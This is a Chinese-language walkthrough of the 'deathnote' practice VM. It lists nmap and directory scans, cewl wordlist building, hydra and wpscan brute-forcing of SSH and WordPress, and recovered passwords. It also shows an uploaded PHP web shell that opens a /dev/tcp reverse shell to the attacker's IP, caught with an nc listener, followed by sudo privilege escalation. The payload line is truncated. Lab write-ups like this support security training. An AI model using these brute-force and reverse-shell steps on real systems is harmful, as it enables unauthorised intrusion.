deathnote靶机攻略

deathnote

扫描及信息搜集

此靶机需要修改/etc/hosts添加dns，不然无法跳转主页

nmap -sV -A -p- 10.4.7.133

dirsearch -u http://10.4.7.133

http://10.4.7.133/robots.txt

在此目录下发现提示

访问下，发现无法正常显示

wget http://10.4.7.133/important.jpg

cat important.jpg

提示在hint

需要找到notes.txt和user.txt，再使用dirb扫描看看结果

dirb http://10.4.7.133 

在结果中尝试访问

http://10.4.7.133/wordpress/wp-content/uploads/2021/07/

找到这两个文件

使用wget下载这两个文件

使用爬取将密码写入一个文件

cewl http://deathnote.vuln/wordpress/ -w kirapasswd.txt

再把hint页中的这条加入密码本，将notes.txt也放入密码本

密码爆破

wpscan --url http://10.4.7.133/wordpress/ -U user.txt -P kirapasswd.txt

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f -t 50 

l
death4me

渗透

此处发现上传框，尝试上传木马

木马内容

& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

点击木马文件复制url

kali开启nc

nc -lvvp 12138

随后访问复制的url执行木马即可反弹成功

家目录l目录下发现user.txt文件，该密码文件为brainfuck

解码结果为如图

上述信息没发现有啥作用

在/opt目录下有信息文件

尝试解码

如图16进制解码再用base64解码得到密码

passwd : kiraisevil

尝试使用su root或者sudo -l发现不能使用

使用上面九头蛇爆破的ssh l登录，发现和反弹shell的用户没什么区别

于是将密码新破解的密码放入密码字典再次尝试爆破，看看是不是其它用户的密码

hydra -L user.txt -P kirapasswd.txt ssh://10.4.7.133 -V -f 50

得到新用户

kira
kiraisevil

提权

登录kira账户

查看id发现有sudo权限

执行sudo -l发现有sudo所有权限

执行sudo su root完成提权